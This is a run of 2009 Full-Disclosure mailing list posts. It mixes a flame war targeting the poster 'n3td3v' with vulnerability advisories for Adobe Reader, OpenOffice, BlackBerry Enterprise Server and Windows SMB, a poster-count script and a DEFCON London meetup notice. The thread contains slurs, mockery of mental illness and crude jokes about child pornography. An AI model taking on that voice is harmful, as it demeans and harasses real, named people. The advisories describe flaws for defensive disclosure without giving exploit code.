Re: [Full-disclosure] mr wallace must be stopped and i know how
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 i'll trade you my nude photos if you can demonstrate any contribution you have made to the computer security community On Tue, 13 Jan 2009 01:17:03 -0500 Jubei Trippataka vpn.1.fana...@gmail.com wrote: Anyone that can cop that much abuse and prosper has to be extremely sadomasochistic. The delusion that a blogger such as Mr Wallace somehow contributes to the security community is hilarious at first and when the comical side clears you have that pathetic little failed abortion asking why he's the target of abuse. To be honest, I'd rather have my children babysat by Josef Fritzel than take security advice from this schizo. -- ciao JT -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAklsYm8ACgkQynWwk3/AtyMnEAP/fvQZCdLaomFt9q4cyJR+FggOcr9b PcpszDsqaKS05KmgR16KjDDIRN9T2tTOhfqhN3Am1SOv0V9KISTkvuODcNMcIpIuu9Jg PIUb62p80egiaBHmNdfrZfFuRPp7fKzzWQyOqpHD+Yq3q7kF2B02qqvt1TLUnUg1ikfZ xNkJAWU= =I6gd -END PGP SIGNATURE- -- Need cash? Click here to get a payday loan. http://tagline.hushmail.com/fc/PnY6qxtVaLJablbbAMh69AaxiQDIXGAemVvk2VFZs21sUl2eTyHw8/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mr wallace must be stopped and i know how
That would be child pornography... On Tue, Jan 13, 2009 at 11:44 AM, sexyazngr...@mac.hush.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 i'll trade you my nude photos if you can demonstrate any contribution you have made to the computer security community On Tue, 13 Jan 2009 01:17:03 -0500 Jubei Trippataka vpn.1.fana...@gmail.com wrote: Anyone that can cop that much abuse and prosper has to be extremely sadomasochistic. The delusion that a blogger such as Mr Wallace somehow contributes to the security community is hilarious at first and when the comical side clears you have that pathetic little failed abortion asking why he's the target of abuse. To be honest, I'd rather have my children babysat by Josef Fritzel than take security advice from this schizo. -- ciao JT -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAklsYm8ACgkQynWwk3/AtyMnEAP/fvQZCdLaomFt9q4cyJR+FggOcr9b PcpszDsqaKS05KmgR16KjDDIRN9T2tTOhfqhN3Am1SOv0V9KISTkvuODcNMcIpIuu9Jg PIUb62p80egiaBHmNdfrZfFuRPp7fKzzWQyOqpHD+Yq3q7kF2B02qqvt1TLUnUg1ikfZ xNkJAWU= =I6gd -END PGP SIGNATURE- -- Need cash? Click here to get a payday loan. http://tagline.hushmail.com/fc/PnY6qxtVaLJablbbAMh69AaxiQDIXGAemVvk2VFZs21sUl2eTyHw8/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mr wallace must be stopped and i know how
maybe you could have impressed somebody with that offer 30 years ago. Today with all the great looking pornstars on the net it is probably a great relief we don't have to look at your nude pictures. On 13.01.2009, at 10:44, sexyazngr...@mac.hush.com wrote: i'll trade you my nude photos if you can demonstrate any contribution you have made to the computer security community ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mr wallace must be stopped and i know how
I am quite sure even 30 years ago there were laws against child pornography - but than again, 30 years ago I doubt even his parents were born. On Tue, Jan 13, 2009 at 1:44 PM, Peter Bruderer peter.brude...@brg.chwrote: maybe you could have impressed somebody with that offer 30 years ago. Today with all the great looking pornstars on the net it is probably a great relief we don't have to look at your nude pictures. On 13.01.2009, at 10:44, sexyazngr...@mac.hush.com wrote: i'll trade you my nude photos if you can demonstrate any contribution you have made to the computer security community ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200901-09 ] Adobe Reader: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200901-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Reader: User-assisted execution of arbitrary code Date: January 13, 2009 Bugs: #225483 ID: 200901-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Adobe Reader is vulnerable to execution of arbitrary code. Background == Adobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-text/acroread8.1.3 = 8.1.3 Description === * An unspecified vulnerability can be triggered by a malformed PDF document, as demonstrated by 2008-HI2.pdf (CVE-2008-2549). * Peter Vreugdenhil, Dyon Balding, Will Dormann, Damian Frizza, and Greg MacManus reported a stack-based buffer overflow in the util.printf JavaScript function that incorrectly handles the format string argument (CVE-2008-2992). * Greg MacManus of iDefense Labs reported an array index error that can be leveraged for an out-of-bounds write, related to parsing of Type 1 fonts (CVE-2008-4812). * Javier Vicente Vallejo and Peter Vregdenhil, via Zero Day Initiative, reported multiple unspecified memory corruption vulnerabilities (CVE-2008-4813). * Thomas Garnier of SkyRecon Systems reported an unspecified vulnerability in a JavaScript method, related to an input validation issue (CVE-2008-4814). * Josh Bressers of Red Hat reported an untrusted search path vulnerability (CVE-2008-4815). * Peter Vreugdenhil reported through iDefense that the Download Manager can trigger a heap corruption via calls to the AcroJS function (CVE-2008-4817). Impact == A remote attacker could entice a user to open a specially crafted PDF document, and local attackers could entice a user to run acroread from an untrusted working directory. Both might result in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-text/acroread-8.1.3 References == [ 1 ] CVE-2008-2549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2549 [ 2 ] CVE-2008-2992 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992 [ 3 ] CVE-2008-4812 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4812 [ 4 ] CVE-2008-4813 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4813 [ 5 ] CVE-2008-4814 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4814 [ 6 ] CVE-2008-4815 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4815 [ 7 ] CVE-2008-4817 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4817 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200901-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Simple request
FYI: Since 1st Jan there are 527 messages posted to FD. The overall amount of Dec' 08 was 637 messages and we haven't passed the mid-January yet. Some numbers of 2008: Oct '08: 531 Mar '08: 600 Jan '08: 615 Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything... Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Simple request
Can you tell us what percentage of those were spam from n3tty and his ilk? I would do it myself, but I have him directed straight to the delete folder 2009/1/13 Juha-Matti Laurio juha-matti.lau...@netti.fi FYI: Since 1st Jan there are 527 messages posted to FD. The overall amount of Dec' 08 was 637 messages and we haven't passed the mid-January yet. Some numbers of 2008: Oct '08: 531 Mar '08: 600 Jan '08: 615 Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything... Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Simple request
I have not counted percentages but let's check this archive view http://lists.grok.org.uk/pipermail/full-disclosure/2009-January/author.html and it's possible to run a script to http://lists.grok.org.uk/pipermail/full-disclosure/2009-January.txt etc. Juha-Matti James Rankin [kz2...@googlemail.com] kirjoitti: Can you tell us what percentage of those were spam from n3tty and his ilk? I would do it myself, but I have him directed straight to the delete folder 2009/1/13 Juha-Matti Laurio juha-matti.lau...@netti.fi FYI: Since 1st Jan there are 527 messages posted to FD. The overall amount of Dec' 08 was 637 messages and we haven't passed the mid-January yet. Some numbers of 2008: Oct '08: 531 Mar '08: 600 Jan '08: 615 Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mr wallace must be stopped and i know how
On Tue, 13 Jan 2009 11:54:25 +0200, Avraham Schneider said: That would be child pornography... The statutes in most places specify *calendar* age, not intellectual age. pgpHNndpHWYoD.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Simple request
On Tue, Jan 13, 2009 at 1:24 PM, Juha-Matti Laurio juha-matti.lau...@netti.fi wrote: Hey how many of the recent messages use bandwidth, disk space, your time etc. without disclosing anything... They disclosed their hatred towards *someone*, that personality of hatred is unlikely to end so plenty was disclosed that law enforcement and counter-terrorism officials will find useful. Their hatred is unlikely to be exclusive to 'n3td3v' and will be carried off into the offline communities where they live. Keep your friends close and your enemies closer. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:006 ] openoffice.org
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:006 http://www.mandriva.com/security/ ___ Package : openoffice.org Date: January 13, 2009 Affected: 2008.0, 2008.1 ___ Problem Description: Heap-based overflow on functions to manipulate WMF and EMF files in OpenOffice.org documments enables remote attackers to execute arbitrary code on documments holding certain crafted either WMF or EMF files (CVE-2008-2237) (CVE-2008-2238). This update provide the fix for these security issues and further openoffice.org-voikko package has been updated as it depends on openoffice.org packages. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2237 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2238 ___ Updated Packages: Mandriva Linux 2008.0: c8003a94012cbfbfdc78dc59c29b317a 2008.0/i586/openoffice.org-2.2.1-4.6mdv2008.0.i586.rpm eb4558b9ddf8102b8807904480347bce 2008.0/i586/openoffice.org-devel-2.2.1-4.6mdv2008.0.i586.rpm 3fbd98ec9ec98d19920ee2f7e1e50a87 2008.0/i586/openoffice.org-devel-doc-2.2.1-4.6mdv2008.0.i586.rpm 142a1aed05561e28c3830914e6d0f974 2008.0/i586/openoffice.org-galleries-2.2.1-4.6mdv2008.0.i586.rpm c588126b14b10b994ba9cbfb35723c94 2008.0/i586/openoffice.org-gnome-2.2.1-4.6mdv2008.0.i586.rpm 29cf48aaa4cd6b169d95455ddd46272d 2008.0/i586/openoffice.org-kde-2.2.1-4.6mdv2008.0.i586.rpm 1b7913e881bb6ba38a8b3a2636e380b4 2008.0/i586/openoffice.org-l10n-af-2.2.1-4.6mdv2008.0.i586.rpm 14a9c26ab83b959573f1c6dd5bc9eec1 2008.0/i586/openoffice.org-l10n-ar-2.2.1-4.6mdv2008.0.i586.rpm eef10a2af729a9b2c0cdb99e26e6a293 2008.0/i586/openoffice.org-l10n-bg-2.2.1-4.6mdv2008.0.i586.rpm c831e696a37859692ce7b660be2728d9 2008.0/i586/openoffice.org-l10n-br-2.2.1-4.6mdv2008.0.i586.rpm 16a3ccecb405adbc116d2f53eb7dd3fe 2008.0/i586/openoffice.org-l10n-bs-2.2.1-4.6mdv2008.0.i586.rpm ad7019f7bb2f72457babbd8d64210296 2008.0/i586/openoffice.org-l10n-ca-2.2.1-4.6mdv2008.0.i586.rpm 14f8fbac77b568f31b690ca45f7b80e5 2008.0/i586/openoffice.org-l10n-cs-2.2.1-4.6mdv2008.0.i586.rpm c37d144a36fde7f8413304ab777b9f94 2008.0/i586/openoffice.org-l10n-cy-2.2.1-4.6mdv2008.0.i586.rpm 11bb48776cc25cb989487b28417f682f 2008.0/i586/openoffice.org-l10n-da-2.2.1-4.6mdv2008.0.i586.rpm c997b174dead2e7908ddcbed9a5eb09d 2008.0/i586/openoffice.org-l10n-de-2.2.1-4.6mdv2008.0.i586.rpm 1e01973b26d83ce9d6e7125b1bd231c8 2008.0/i586/openoffice.org-l10n-el-2.2.1-4.6mdv2008.0.i586.rpm 7a4bfa6c64fb50b81096850e95dfd012 2008.0/i586/openoffice.org-l10n-en_GB-2.2.1-4.6mdv2008.0.i586.rpm b4d13ec8eb43a85c23d5bc3abe4e8fa5 2008.0/i586/openoffice.org-l10n-es-2.2.1-4.6mdv2008.0.i586.rpm 744c9dca6221390b621443792d8d5d31 2008.0/i586/openoffice.org-l10n-et-2.2.1-4.6mdv2008.0.i586.rpm 39eaaba50da97d0a61639d142212eb99 2008.0/i586/openoffice.org-l10n-eu-2.2.1-4.6mdv2008.0.i586.rpm 3bbb1a241620517de9aedbc75c4e77c6 2008.0/i586/openoffice.org-l10n-fi-2.2.1-4.6mdv2008.0.i586.rpm b9cf6178fd798d537512343482b6c002 2008.0/i586/openoffice.org-l10n-fr-2.2.1-4.6mdv2008.0.i586.rpm 104f9ae58413f262150ffd8b51a7d586 2008.0/i586/openoffice.org-l10n-he-2.2.1-4.6mdv2008.0.i586.rpm 35ddf2bff8b4b247ee28bb0319482bb9 2008.0/i586/openoffice.org-l10n-hi-2.2.1-4.6mdv2008.0.i586.rpm c951a086ef149b70b375c8da8911502c 2008.0/i586/openoffice.org-l10n-hu-2.2.1-4.6mdv2008.0.i586.rpm db6b30cb357b57b0ffdc2f86a6ace716 2008.0/i586/openoffice.org-l10n-it-2.2.1-4.6mdv2008.0.i586.rpm 3e30f9903834545ae0e2026d29b2d827 2008.0/i586/openoffice.org-l10n-ja-2.2.1-4.6mdv2008.0.i586.rpm 117e6645f44e54308426191ba4b0a9a2 2008.0/i586/openoffice.org-l10n-ko-2.2.1-4.6mdv2008.0.i586.rpm ec60d3ff33e8cf25521c1deb18f5dce9 2008.0/i586/openoffice.org-l10n-mk-2.2.1-4.6mdv2008.0.i586.rpm b3f0eacad6cd88595d00d330cb53cc5a 2008.0/i586/openoffice.org-l10n-nb-2.2.1-4.6mdv2008.0.i586.rpm b1318c5c509b9aa7c07b22b0fee5c384 2008.0/i586/openoffice.org-l10n-nl-2.2.1-4.6mdv2008.0.i586.rpm 0f9a26d677e11dd20fd7a9a4c54010da 2008.0/i586/openoffice.org-l10n-nn-2.2.1-4.6mdv2008.0.i586.rpm e22bd6858ddcac57d4a211546e428456 2008.0/i586/openoffice.org-l10n-pl-2.2.1-4.6mdv2008.0.i586.rpm c235b9b8cf1bb6f4793f4060bc134910 2008.0/i586/openoffice.org-l10n-pt-2.2.1-4.6mdv2008.0.i586.rpm 079751acd480d979685527a8c02bb6e6 2008.0/i586/openoffice.org-l10n-pt_BR-2.2.1-4.6mdv2008.0.i586.rpm 82130aef5ded913e0bcee08b10e93175 2008.0/i586/openoffice.org-l10n-ru-2.2.1-4.6mdv2008.0.i586.rpm 13b53d0c44e9578e91e4048257e1d60e 2008.0/i586/openoffice.org-l10n-sk-2.2.1-4.6mdv2008.0.i586.rpm
Re: [Full-disclosure] mr wallace must be stopped and i know how
What makes you believe that there is any criteria that qualifies him as an adult? On Tue, Jan 13, 2009 at 6:13 PM, valdis.kletni...@vt.edu wrote: On Tue, 13 Jan 2009 11:54:25 +0200, Avraham Schneider said: That would be child pornography... The statutes in most places specify *calendar* age, not intellectual age. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Full Disclosure Top List
The top list of people posting to fd (allthough people like n3td3v have several aliases and are listed several times). .. | Top List For: January_2009 | +.--.+ | nr. | posts. | user. | ++--++ | 1 | 88 | n3td3v,andrew.wallace,sexyazngrl69 | 2 | 41 | Ureleet | | 3 | 39 | Avraham_Schneider | | 4 | 34 | j-f_sentier | | 5 | 19 | Valdis.Kletnieks_at_vt.edu| | 6 | 17 | Biz_Marqee| | 7 | 14 | Paul_Schmehl | | 8 | 11 | Mainbox_Notif | | 9 | 11 | James_Matthews| | 10| 10 | Ed_Carp | ''--'' .. | Top List For: December_2008| +.--.+ | nr. | posts. | user. | ++--++ | 1 | 78 | Ureleet | | 2 | 76 | n3td3v| | 3 | 26 | Valdis.Kletnieks_at_vt.edu| | 4 | 25 | James_Matthews| | 5 | 22 | j-f_sentier | | 6 | 17 | Elazar_Broad | | 7 | 15 | Bipin_Gautam | | 8 | 12 | zdi-disclosures_at_3com.com | | 9 | 12 | security_at_mandriva.com | | 10| 12 | Mike_C| ''--'' .. | Top List For: November_2008| +.--.+ | nr. | posts. | user. | ++--++ | 1 | 112 | n3td3v| | 2 | 61 | Ureleet | | 3 | 35 | Valdis.Kletnieks_at_vt.edu| | 4 | 30 | adrian.lamo_at_hushmail.com | | 5 | 22 | James_Matthews| | 6 | 21 | Trollie_Fingers | | 7 | 18 | Mike_C| | 8 | 15 | vulcanius | | 9 | 15 | security_at_mandriva.com | | 10| 14 | Fredrick_Diggle | ''--'' I believe that n3td3v is trying to destroy this list so that his history here somehow magically dissapears, this will not happen ofcourse because what gets posted to the Internet stays on the Internet and is available for future employers to see for all eternity. ## In case someone else wants to use this script: ## #!/bin/bash LIST_SIZE=13 function _get() { MONTH=$2.txt; URL=$1; wget $URL -O $MONTH 1/dev/null 2/dev/null; #ignore if name contains quotations etc. echo..; echo -n | Top List For: $2 let S=37-$(echo $2 | wc -c); for space in $(seq 0 $S); do echo -n ; done echo|; echo+.--.+; echo| nr. | posts. | user. |; echo++--++; PRE=$(cat $MONTH | grep | sed -e 's/^...//g' -e 's/ /_/g' | sort | uniq -c | sort -rn | head -n $LIST_SIZE | sed -e 's/^[ \t]*//g' -e 's/ /y/g'); COUNT=1; for CURRENT in $(echo $PRE); do declare -a ITEMS=($(echo $CURRENT | sed 's/y/ /g')); # format nr col echo -n | $COUNT; let S=6-$(echo $COUNT | wc -c); for space in $(seq 0 $S); do echo -n ; done # format posts. col. echo -n | ${ITEMS[0]}; let S=8-$(echo ${ITEMS[0]} | wc -c); for space in $(seq 0 $S); do echo -n ; done echo -n |; # format user col. echo -n ${ITEMS[1]}; if [ $(echo ${ITEMS[1]} | wc -c) -gt 28 ]; then ITEMS[1]=$(echo ${ITEMS[1]} | sed 's/\(^.\{,28\}\).*$/\1/g'); fi let S=28-$(echo ${ITEMS[1]} | wc -c); for space in $(seq 0 $S); do echo -n ; done echo |; let COUNT=$COUNT+1; done echo ''--''; } _get http://lists.grok.org.uk/pipermail/full-disclosure/2009-January/author.html; January_2009 echo; echo; _get
[Full-disclosure] ANNOUNCE: DEFCON London - DC4420 - January meet - Thursday 15th Jan 2009
hi all! here is an announcement, shamelessly cut pasted from the website (i.e. alien wrote it really :) Thursday 15th January. Happy seasonal greetings and stuff. The new year rolls in, the Govt 'crazy ideas' talking starts again - however here - sanity reigns and thus we bring you: Trampoliner - Automatically choosing return addresses for buffer overflow attacks - Tom Keetch MUFFIN recipe: How to find software vulnerabilities on Microsoft OS demo of firewire data leakage - Guillaume Vissian Architecture Analysis. - Orac failed allocations, more interesting than pie - xz All welcome, and if it's your first time you will be talking. Make it a new year resolution to talk to someone you don't know at this meeting! mailing list - login and look at the projects forum for details. the list will only accept posts from subscriber addresses! so if you send something and it doesn't appear, that's why... Where? Upstairs @ Glassblower http://maps.google.com/maps?f=qhl=engeocode=q=W1B+5DLie=UTF8ll=51.510625,-0.136878spn=0.00629,0.021415z=16iwloc=addr 42 Glasshouse St, Piccadilly, W1B 5JY doors open from 7, speaking starts from 7.30 - please try and be prompt as some people need to go early to get trains back out of London. we have private use of the whole of the upstairs till 11.30. real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 'Doombar'. other stuff on draught : Guinness, Staropramen, Hoegaarden, Leffe. even more stuff on draught : Becks, Fosters, 1664 food menu is extensive and most importantly : they do Pie - but they stop serving at 9pm! comment/participate at http://dc4420.org/ see you there!!! cheers, MM -- In DEFCON, we have no names... errr... well, we do... but silly ones... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full Disclosure Top List
On Tue, Jan 13, 2009 at 6:32 PM, Fd Top List fdtopl...@live.se wrote: n3td3v have several aliases and are listed several times. Mine have only ever been: n3td3v xploitable hackthegov worriedsecurity sexyazngrl69 Nothing to do with me. I believe that n3td3v is trying to destroy this list I'm not trying to destroy anything i'm a good guy trying to counter the threats like many of us are trying to do. Please don't get a job in security or intelligence if thats your genuine conclusion. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server Attachment Service PDF Distiller 'symWidths' Heap Overflow Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 01.12.09 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 12, 2009 I. BACKGROUND The BlackBerry Enterprise Server is a suite of applications used to connect enterprise email and messaging services to BlackBerry device users. It consists of a variety of applications, one of which is the Attachment Service. This application is used to convert email attachments into a format that is easily rendered on BlackBerry devices. When a user requests an attachment on their BlackBerry device, the Attachment Service will obtain the attachment, parse and convert it, and then send it to the user for viewing. The Attachment Service is capable of converting a variety of different file formats, including PDF files. This vulnerability affects the PDF filter/distiller. For more information, see the vendor's site found at the following link. http://na.blackberry.com/eng/services/server/ II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in Research In Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an attacker to execute arbitrary code with the privileges of the affected service, usually SYSTEM. The vulnerability occurs when parsing a certain stream inside of a PDF file. During parsing, a heap buffer is filled up with without properly checking to see whether the buffer is large enough to hold the current value. By inserting a large number of values, it is possible to overflow the buffer, and corrupt object pointers. This can lead to pointers being controlled, which results in the execution of arbitrary code. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the Attachment Service, usually SYSTEM. In order to exploit this vulnerability, an attacker must email an enterprise BlackBerry user a malicious PDF file. Then, the user must attempt to view the file on their device. It is important to note that a user must request the attachment in order to trigger the parsing. It is not possible to exploit this vulnerability in a completely automated fashion without a user asking to view the file. However, after a user has requested the attachment, no further interaction is necessary. Exploitation of heap overflow vulnerabilities on modern operating systems can be difficult due to heap integrity checks. However, the code in the PDF Distiller offers a wide variety of application specific targets for overwriting. By sculpting the heap it is possible place pointers in the buffer and use these to gain arbitrary code execution. IV. DETECTION iDefense has confirmed the existence of this vulnerability in BlackBerry Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the most current version, as of the publishing of this report. This vulnerability was confirmed in BlackBerry Enterprise Server for Microsoft Exchange, but is believed to affect the Lotus and Novell versions as well. Previous versions may also be affected. V. WORKAROUND It is possible to disable the PDF Distiller, which will prevent the conversion of PDF files by the Attachment Server. The following workaround was suggested by RIM for a previous PDF Distiller vulnerability, and has been verified to prevent the vulnerability described in this report. This workaround can be accomplished as follows: To remove the PDF file extension from the list of supported file format extensions, complete the following actions: 1. From the Windows Desktop, open the BlackBerry Server Configuration tool. 2. Click the Attachment Server tab. 3. In the Format Extensions field, delete pdf: from the colon delimited list of extensions. 4. Click Apply. 5. Click OK. After this, it is also necessary to completely disable the PDF distiller from loading, which will prevent an attacker from renaming a PDF to some other format extension. In order to do this, complete the following steps: 1. On the Windows Desktop, open the BlackBerry Server Configuration tool. 2. Click the Attachment Server tab. 3. In the Configuration Option drop-down list, select Attachment Server. 4. In the Distiller Settings section, next to the distiller name Adobe PDF, clear the check box in the Enabled column. 5. Click Apply. 6. Click OK. 7. On the Windows Desktop, in Administrative Tools, open Services. 8. Right-click BlackBerry Attachment Service and click Stop. 9. Right-click BlackBerry Attachment Service and click Start. 10. Close Services. In Microsoft Exchange and Novell GroupWise environments, complete the following additional steps: 1. On the Windows Desktop, in Administrative Tools, open Services. 2. Right-click BlackBerry Dispatcher and click Stop. 3. Right-click BlackBerry Dispatcher and click Start. 4. Close Services. In IBM Lotus Domino environments, complete the following additional steps: 1. Open the IBM Lotus Domino Administrator. 2. Click the Server
[Full-disclosure] ZDI-09-002: Microsoft SMB NT Trans2 Request Parsing Remote Code Execution Vulnerability
ZDI-09-002: Microsoft SMB NT Trans2 Request Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-002 January 13, 2009 -- CVE ID: CVE-2008-4835 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows Server 2008 Microsoft Windows Vista Microsoft Windows Server 2003 Microsoft Windows XP Microsoft Windows 2000 SP4 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6662. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to trigger a denial of service condition on vulnerable installations of Microsoft Windows; remote code execution is also theoretically possible. User interaction is not required to exploit this vulnerability. The specific flaw exists in the processing of SMB requests. By specifying malformed values during an NT Trans2 request an attacker can cause the target system to kernel panic thereby requiring a reboot of the system. Further manipulation can theoretically result in remote unauthenticated code execution. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx -- Disclosure Timeline: 2008-08-14 - Vulnerability reported to vendor 2009-01-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmas...@3com.com. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-09-001: Microsoft SMB NT Trans Request Parsing Remote Code Execution Vulnerability
ZDI-09-001: Microsoft SMB NT Trans Request Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-001 January 13, 2009 -- CVE ID: CVE-2008-4834 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Windows XP Microsoft Windows 2000 SP4 Microsoft Windows Server 2003 Microsoft Windows Vista Microsoft Windows Server 2008 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6662. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to trigger a denial of service condition on vulnerable installations of Microsoft Windows; remote code execution is also theoretically possible. User interaction is not required to exploit this vulnerability. The specific flaw exists in the processing of SMB requests. By specifying malformed values during an NT Trans request an attacker can cause the target system to kernel panic thereby requiring a reboot of the system. Further manipulation can theoretically result in remote unauthenticated code execution. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx -- Disclosure Timeline: 2008-06-25 - Vulnerability reported to vendor 2009-01-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by 